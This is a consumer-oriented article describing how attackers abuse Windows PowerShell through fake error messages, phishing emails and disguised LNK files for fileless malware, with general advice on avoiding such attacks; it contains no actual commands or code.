Windows PowerShell Could Allow Viruses to Infiltrate Undetected
Whenever a Windows tool has elevated access to a computer, someone is hot on the trail, trying to find a way to exploit it to run malware on other users' systems.
But what is PowerShell and how can it be abused?
What is PowerShell on Windows?
Windows PowerShell Could Allow Viruses to Infiltrate Undetected Picture 1
Windows PowerShell is an advanced configuration and automation tool. You can use it to execute commands to tweak your system or run automated scripts that perform complex tasks for you.
Because PowerShell has system permissions to change important settings on your PC or run system-sensitive scripts, bad guys will find ways to get it to execute malicious code. But before we get into how it can be abused, it's important to note that PowerShell itself isn't a malicious application. It's a core part of Windows that can't be disabled.
What makes PowerShell so dangerous?
Windows PowerShell Could Allow Viruses to Infiltrate Undetected Picture 2
When a bad actor wants to abuse PowerShell, they typically do one of two things: Trick people into executing malicious code in PowerShell or create a file that runs a malicious script when opened.
Malicious actors convince people to run commands
First, let's look at when a malicious actor tricks someone into running a PowerShell command. This tactic typically involves scaring the victim into believing they need to run a PowerShell command to fix a non-existent problem.
One such tactic, The Register reports, involves bad actors hacking into legitimate websites and modifying them to display fake error messages. The error says that something is wrong with the user's copy of Windows, Google Chrome, Office, or OneDrive. To fix the "problem," the fake error tells the user to run a PowerShell command to fix the problem.
Of course, the provided code doesn't fix anything. Instead, it tells PowerShell to connect to a server, download a malicious executable from an external server, and run it. One instance of this attack used PowerShell to download a dropper, which then downloaded five other strains of malware onto the target PC.
Another variation of this 'user-triggered' PowerShell attack has been spotted being sent via email. The email includes an HTML file designed to look like Microsoft Word. When opened, it claims that it cannot display information in the Word document because an extension has stopped working. The user is then asked to copy-paste malicious code into PowerShell to fix the error or download a malicious file that does the job for the attacker.
Malicious file uses PowerShell to run fileless malware
A scarier version of the PowerShell attack uses fileless malware to attack the target. This uses PowerShell to perform malicious tasks without downloading any files to the victim's PC. If the malware doesn't download any files, it prevents antivirus software from detecting it, making it difficult to find and remove.
This attack method often disguises the LNK file containing the malicious script as another file. In the illegal movie example, the LNK file was modified to look like a video file to trick people into running it.
How to Avoid PowerShell Attacks
The problem with taking steps to avoid PowerShell attacks is that there are legitimate fixes that require you to type commands into PowerShell, so before you type a command, you should take your time and consider how trustworthy the source is.
If you are looking for a fix and find a reputable and trustworthy website that says you should use a command, then you can run that command. If that command comes to you from a fake error message designed to scare you, then it will cause damage.
If you see a command and aren't sure what it does, try searching for it online. If it's useful, you'll see results from other people recommending it. If you don't find anything (or even see someone reporting it as malicious), then it's probably not a good idea to run it.
If you accidentally fall victim to a PowerShell attack, you can try to find the best antivirus programs to remove the malware. However, as mentioned earlier, PowerShell attacks will do their best to stay undetected. If you notice anything unusual after running a PowerShell command, it is best to reinstall your operating system to ensure everything is clean.
PowerShell is a handy tool that gives you advanced control over your PC. However, some bad guys try to trick people into using it for the wrong purposes. Fortunately, if you stay alert, you can avoid being attacked.
You should read it
- About PowerShell
- How to install PowerShell 7.0 in Windows 10/8/7
- What is PowerShell Basic commands in PowerShell
- Use PowerShell to download any file on Windows 10
- PowerShell command in Windows
- How to use PowerShell's default parameter to change the command behavior
- How to check PowerShell version in Windows 10
- Instructions on how to use PowerShell in Windows Server 2012
- What is Windows PowerShell? How to use Windows PowerShell
- What to do when Windows can't find PowerShell?
- PowerShell and everything you need to know about it
- Now you can run PowerShell on both Linux and macOS
May be interested
The world's most powerful radar system, tracking multiple targets at a range of up to 3,500 km
How to Turn Windows 11 into macOS
What is a TF card? How is it different from a microSD card?
Fun Alexa Games You Can Play on Amazon Echo
How to Increase Video Quality on Media.io Video Enhancer
If you have an AMD CPU, install this important security update!